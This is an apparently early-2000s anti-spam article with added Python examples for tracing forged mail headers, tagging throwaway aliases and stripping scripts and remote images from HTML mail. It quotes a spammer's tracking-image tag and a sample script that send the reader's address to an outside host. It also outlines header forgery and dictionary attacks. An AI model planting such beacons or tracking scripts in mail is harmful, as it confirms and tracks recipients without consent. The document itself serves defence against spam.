Sure, flyers are annoying. Sure, we might be sick of the myriad of commercials for title loans and ways of living even closer to the line than paycheck to paycheck. We're uneasy opening the door to strangers trying to sell us things...
...but that pales in comparison to the number of con men, scam artists and downright lies that are waiting to fill up your electronic mailbox.
If they haven't found you yet, then you either have a .mil or .gov e-mail address, or you're lucky so far. Don't let them find you!
WHAT'S THE PROBLEM?
If you have a .mil or .gov e-mail address, i.e. you work for the military or government, you are unlikely to get much spam. Why? The folks doing the spamming want to stay under the radar. If politicians see none of this at work, they're unlikely to see it as much of a problem. If there's no problem, then why seek a solution?
Flyers come the closest to the "invasiveness" of spam. You have to go through them to get at your regular mail. However, unless the companies that make the flyers are psychopaths, they are unlikely to send you the same flyer 15 times a week, every week. Why? It's because they bear some of the cost; paper, printing and distribution aren't free. (Some flyers are even relevant and useful because they're local and for real businesses.)
Spamming, on the other hand, is predicated on theft of service. You're paying to pick it up. Your service provider is paying to try and block some of it. You're paying for the electronic mailbox it's being held in (and just like with too many flyers, if you get too much spam, real mail won't fit in your mailbox any more). If you're forwarding or receiving your mail on a mobile phone or PDA, you're not only typically paying more, but you're getting intrusive alerts that have nothing to do with friends, family or job.
Over a 2 week period, I received in excess of 150 (actual number 153) pieces of spam. This is now normal traffic for my mailbox.
The highlights include:
Not to mention the e-mails for enlarging your gonads, getting fake diplomas (i.e. diplomas from "non-accredited universities" for money), or the highly dangerous African scams... (see here for the vast variety and some interesting 'counterstrikes' against the scammers)
MISDIRECTION
Just a little tidbit... if you receive a spam saying that it's from hotmail.com... you can be 99.5% sure that it did not come from Hotmail.
The vast majority of spam headers are faked. If someone has the right piece of software (or codes it themselves), they can fake the From:, the Mailer:... they don't even have to have your name listed in the To: (think of how the BCC/Blind Carbon Copy works), and often times will address it to someone else to make it look like you somehow received it "by mistake". Make no mistake... they meant you to receive it.
This means that you have to work harder to actually complain to the right people...
What you usually see in your e-mail package are the abbreviated headers for the e-mail. Most e-mail packages have a way to see the full headers. These often begin with Received: from and contain information about how the e-mail got to you. Wait... it gets worse before it gets better...
Spammers can't completely fake this information, but they can do something almost as bad by inserting some fake information. They can also route mail through someone else's badly-configured mail server to further hide their identity (these badly configured mail servers, which relay mail that doesn't start or end at the mail server, are called open relays). This can make it tough to trace by hand...
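Here is the by-hand trace described above as a short script. It is an added example, not part of the original article or of SpamCop or SamSpade. It assumes Postfix-style Received: lines, that mx.example.net is your own (trusted) mail server, and a constructed sample message using documentation addresses.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample (not from the page). mx.example.net stands for the
# reader's own mail server; all hosts and IPs are documentation values.
RAW = """\
Received: from relay.example.org (relay.example.org [203.0.113.25])
\tby mx.example.net with ESMTP; Mon, 01 Jan 2001 10:00:05 -0500
Received: from hotmail.com (unknown [198.51.100.77])
\tby relay.example.org with SMTP; Mon, 01 Jan 2001 10:00:01 -0500
Received: from mail.hotmail.com ([192.0.2.1])
\tby hotmail.com with SMTP; Mon, 01 Jan 2001 09:59:00 -0500
From: "A Friend" <someone@hotmail.com>
To: somebody.else@example.com
Subject: constructed sample

body
"""

HOP = re.compile(r"from\s+(?P<helo>\S+)\s+\((?:(?P<rdns>\S+)\s+)?"
                 r"\[(?P<ip>[\d.]+)\]\).*?\bby\s+(?P<by>\S+)", re.S)

def trace(raw, trusted):
    """Split the Received chain into hops we can believe and hops we cannot."""
    msg = message_from_string(raw)
    hops = [m.groupdict() for v in msg.get_all("Received", [])
            if (m := HOP.search(v))]
    verified = []
    for hop in hops:                      # headers are prepended: newest first
        if hop["by"].lower() not in trusted:
            break                         # stamped by a foreign server: forgeable
        verified.append(hop)
    handoff = verified[-1] if verified else None
    claimed = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    peer = (handoff["rdns"] or "").lower() if handoff else ""
    return {
        "handoff_ip": handoff["ip"] if handoff else None,   # last provable sender
        "handoff_host": peer,
        "claimed_domain": claimed,
        "from_matches_handoff": peer == claimed or peer.endswith("." + claimed),
        "unverified_hops": len(hops) - len(verified),
    }

if __name__ == "__main__":
    print(trace(RAW, trusted={"mx.example.net"}))
```

Only the hop stamped by your own server is provable; the two lines below it, including the one that says hotmail.com, could have been typed in by the sender. The handoff address is the one whose owner (possibly an open relay) should hear about it.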
Fortunately, there is a little bit of help out there. There's SpamCop **1, which can do a bang-up job of sorting through the faked crud and help you submit reports. There's also SamSpade, a browser that can interpret e-mail headers and let you safely surf without being hijacked. (NOTE: www.samspade.com sells spamming services. Yeah, nice to make it close to the www.samspade.org, you jerks)
With these tools comes some responsibility, of course. Make sure you don't report a mailing list you're a regular subscriber to (it happens). I'd advise a relatively simple rule: if they fake it, bake it. If it says it's from hotmail or lycos and it's not, or the removal address is bigpeepee47@excite.com, or the list of names is large and alphabetical and all from the same domain, then report it!
An additional note: claims of compliance with laws are lies; claims of pending lawsuits or charges for 'interference' are lies. It's all a game to make you less sure about reporting them. Here's an exercise... the next time you see a notice saying "This e-mail complies with Bill S. 1618..." try looking up the bill (you'll find that not only did it not pass, but that the e-mail doesn't even comply with the bill anyhow). Surprise, surprise :)
Think about this, too: Why would you want to do business with people who want so badly to hide their identities from you?
PROTECTION
There are several ways spammers can get your e-mail address.
WEB PAGE
If you have a web page, and you've put in a link that people can click to send
an e-mail to you, then an e-mail address-harvesting "spider" program (so named
because it can crawl around the web :) can interpret that same link and add it to
a spammer's database. It doesn't have to be your own web page, either. If you've
posted your e-mail address in a public guestbook or chat room, it is potentially
harvestable there, too. Make sure you're safe by seeing whether another user
can see your e-mail address or not.
You can add nonsense to your e-mail address and explain how to get rid of it (preferably in a format a computer can't figure out but a human could). Your only other defense is not to care about the e-mail account you're using.
Tip 1: Use an e-mail address for friends and family, but use at least one different e-mail address for your online activities, preferably addresses you can throw away
NEWSGROUPS
If you post to newsgroups using your real e-mail address... that's just begging
for trouble!
Tip 2: If you post to newsgroups, munge your e-mail address
DICTIONARY ATTACK
If your e-mail address is simple, spammers have another tool at their disposal:
the "dictionary attack". The theory is pretty simple: take a database of names,
and try sending to every possible combination of names, initials and numbers
(e.g. 'alan' + 'm' + '39') at a given domain. The bigger the service provider,
the more likely that a dictionary attack will be used, such as on AOL or AT&T.
If the spammers are looking for bounces (and since they're taking the time to
do a relatively 'expensive' dictionary attack), your e-mail address won't bounce,
and they will add it to a list and sell it.
Keep yourself in the clear with an unpredictable name. Make it as long as possible if you can. Put numbers in odd places in your e-mail account name if you can. Use unusual words if you can... but make sure you can still remember it all! If you're "jsmith@aol.com", don't be surprised if you still get spam regardless of all of your other precautions.
Tip 3: Use moderately complex e-mail addresses to avoid dictionary attacks
SELL-OUTS
Someone, some unscrupulous or naive bastard, may decide to sell a list of e-mail
addresses they have access to... including your e-mail address
for extra cash, as a typical business practice, or in revenge.
If you have the patience and setup for it, using a separate e-mail address
when subscribing to each web site or service you sign up for (or even
online draw you enter!... like I said, patience), then you can at least track
down where the breach occurred.
You'll be in a position where it does not matter so much - you can just abandon that e-mail address - but do "discuss" the situation with the company involved. After all, they likely have now screwed over hundreds of folks (who don't have your resources) into receiving unwanted spam.
Tip 4: Help others by tracking down sell-outs
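One way to run the separate-address-per-site scheme without keeping a notebook, as an added example (not from the original article). It assumes your mail provider delivers "user+anything@domain" to your mailbox; the key, user name and domain are constructed placeholders. Each alias carries a keyed tag, so an alias that verifies was really handed out by you and names the site that leaked it, while a guessed one (a dictionary attack) does not verify.

```python
import hashlib
import hmac
import re

SECRET = b"constructed-demo-key"   # assumption: a private key only you hold

def _tag(site):
    """Short keyed checksum that only the key holder can produce."""
    return hmac.new(SECRET, site.encode(), hashlib.sha256).hexdigest()[:10]

def alias_for(site, user="me", domain="example.net"):
    """Build the throwaway address to give to one web site or online draw."""
    site = re.sub(r"[^a-z0-9]", "", site.lower())
    return f"{user}+{site}.{_tag(site)}@{domain}"

def attribute(recipient):
    """Return the site an alias was issued to, or None if it was never issued."""
    m = re.fullmatch(r"[^+@]+\+([a-z0-9]+)\.([0-9a-f]{10})@.+", recipient.lower())
    if not m:
        return None
    site, tag = m.groups()
    return site if hmac.compare_digest(tag, _tag(site)) else None

if __name__ == "__main__":
    issued = alias_for("Big-Draw.example")
    print(issued, "->", attribute(issued))
    print("jsmith@example.net ->", attribute("jsmith@example.net"))
```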
REMOVAL LISTS
Have you looked at that removal web site address or e-mail address they're
giving you? Who do you think runs it? Is "http://61.129.81.52/remove/remove.htm"
likely to honour your remove requests? How about "cigarsmoker2000@yahoo.com"?
The sad, probable truth about these removal lists is that it's unlikely (but possible) that it will remove you from that one spammer's list, but in the world of spam e-mail addresses, you have given them something really valuable... a verified e-mail address. They can sell this. Not for very much, mind you, but a cleaner list is faster and easier to send to than an uncleaned one. You won't get a confirmation of removal by e-mail. You now have only 240 more removal sites to visit to get them all. You will likely get more spam.
If you have access to throwaway addresses, I advise a simple experiment. Next time you get a piece of spam with a removal address in it, put together a throwaway address with the wackiest, longest, most random name you can. Then enter that name on the removal site. It might take a while, but you'll know incoming mail isn't going to be the result of a dictionary attack.
Tip 5: Never respond to remove requests
IMAGES AND JAVASCRIPT
HTML e-mail sure is pretty. In being pretty, though, it can identify to
the spammer that their e-mail got to you. If you're just web-browsing, there's
no way that someone can find out your e-mail address. If you're looking at a
piece of spam, though, it can be just like you typed in your e-mail address on
their website. How can this be?
There are two things that susceptible mail browsers do to make you vulnerable like this: load external (not embedded) graphics, and run javascript. Spammers will include an image tag like this: <img src="http://1.2.3.4/spammy.cgi?youremailaddress.com"> When Outlook Express sees this in your e-mail, it goes out and tries to grab that image for display. The image comes up, you're none the wiser, and the spammer has now verified your e-mail address.
The other technique, Javascript, simply has to include a Javascript popup to a web address that uniquely identifies you. If a web window comes up while you are browsing your mail, it's too late. If you can disable Javascript, do so. Be aware that many products keep Javascript on, even in "High Security" mode, unless you specifically turn it off.
If you're using a vulnerable product, there's likely to be little that can be done. You can make yourself a little safer by disabling the preview window and NOT opening the spam e-mails (in Outlook, this means that you won't be able to report Spam because you can't get to the e-mail headers without opening the e-mail). The only alternatives are to find an e-mail client that isn't vulnerable or can be set to be not vulnerable (Eudora is vulnerable by default, but you can go into Tools->Options->Viewing Mail and uncheck the "Use Microsoft's Viewer" box), or find a service that can filter that kind of spam out (if anyone knows of a service that covers both Javascript and external, but not embedded, images, please let me know).
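What a filter of that kind has to do, as an added example (not part of the original article and not any product's code): drop scripts, script-carrying attributes and externally loaded images, but keep embedded ones. It covers only the two channels described above; the sample message is constructed, apart from the image tag quoted earlier.

```python
from html import escape
from html.parser import HTMLParser

REMOTE = ("http://", "https://", "//")

class MailSanitizer(HTMLParser):
    """Re-emit HTML mail without scripts, event handlers or remote loads."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.findings, self.in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.findings.append(("script", ""))
            return
        kept = []
        for name, value in attrs:
            target = (value or "").strip().lower()
            if name.startswith("on") or target.startswith("javascript:"):
                self.findings.append(("script-attr", name))
            elif name in ("src", "background") and target.startswith(REMOTE):
                self.findings.append(("remote-load", value))
            else:                      # cid: and data: images stay: embedded
                kept.append(f' {name}="{escape(value or "")}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    handle_startendtag = handle_starttag   # treat <img ... /> like <img ...>

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
        else:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.in_script:             # script bodies are discarded
            self.out.append(escape(data))

def sanitize(html_text):
    """Return (cleaned_html, findings) for one HTML mail body."""
    parser = MailSanitizer()
    parser.feed(html_text)
    parser.close()
    return "".join(parser.out), parser.findings

# Constructed sample; the first <img> is the beacon tag quoted in the text.
SAMPLE = ('<body onload="track()"><p>Hello</p>'
          '<img src="http://1.2.3.4/spammy.cgi?youremailaddress.com">'
          '<img src="cid:logo@example.invalid">'
          '<script>window.open("http://192.0.2.9/p?id=abc123")</script></body>')
```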
I'll list susceptible and safe products here as I find out about them.
Tip 6: Don't use vulnerable products
Once an e-mail address is out in "the wild", there's no getting it back again.
LEGISLATION
There are two things I want to address here: subscription practices, and mailing practices.
There's an interesting matter of naming conventions between "direct marketers" and spam-fighters. It concerns a method of "opting-in" to receive mail. There is a method in which you sign up for a list, it sends you an e-mail, and you reply to that e-mail, or type in the code inside that e-mail or what have you...
The direct marketers call this "Double Opt-In". Spam-fighters call this "Confirmed" or "Verified" Opt-In. There is a passionate debate on this subject. What I think it boils down to are these few points:
It's not that I have a problem with the concept of single/unconfirmed opt-in itself (although I worry about the potential for abuse), but I feel there should be some civil liability for the company that runs the list or a third party for signing up unwilling participants en masse. Running a "millions" (of e-mail addresses) list through the e-mail server does not count as any "opt-in". The onus should be on the company not to lose its opt-in and opt-out records, with but a small grace period for problems caused by faulty hardware (as an extenuating circumstance, not a de rigueur defense).
As to mailing practices... one simple rule first: no falsification of headers for commercial e-mail. P.e.r.i.o.d. The End. (Even enacting that simple rule would either cut down or 'legitimize' my spam to about 5% of its current flow)
Other e-mail practises that I would recommend should be made illegal or liable for civil damages:
The focus of the above is to recognize that mailers must respect users' rights to privacy, and not trespass on the users' hardware (scripting in this belligerent manner should be treated as though it were a worm attack)... I don't care much either way about whether "ADV:" is used in front of advertisements, though I do think it questionable behavior to add random numbers to subjects (I believe it is done expressly to bypass simple e-mail filters), or large unique alphanumeric strings to the e-mail (I believe that is done sometimes to track down people trying to report spam through some sort of anonymizing service, and sometimes as a "hashbuster", to screw up e-mail filters that work on hashes or checksums to filter out unwanted mail)
As always, I invite comment... Fight the good fight!
Footnote **1: For those of you who have been on "the wrong side" of a SpamCop
report, please don't overreact. People spend a lot of time going through
their mailboxes to track down spammers and open relays. If the reports are
overwhelming in the "abuse" mailbox, you can ask SpamCop to deposit them in a special
mailbox. If it was someone reporting a mailing list they subscribed to, report
them back to SpamCop; there is precious little patience for SpamCop users who
use the service inappropriately. If it's a report of an open relay, pay attention - sometimes it's the sign of other potential breach points as well.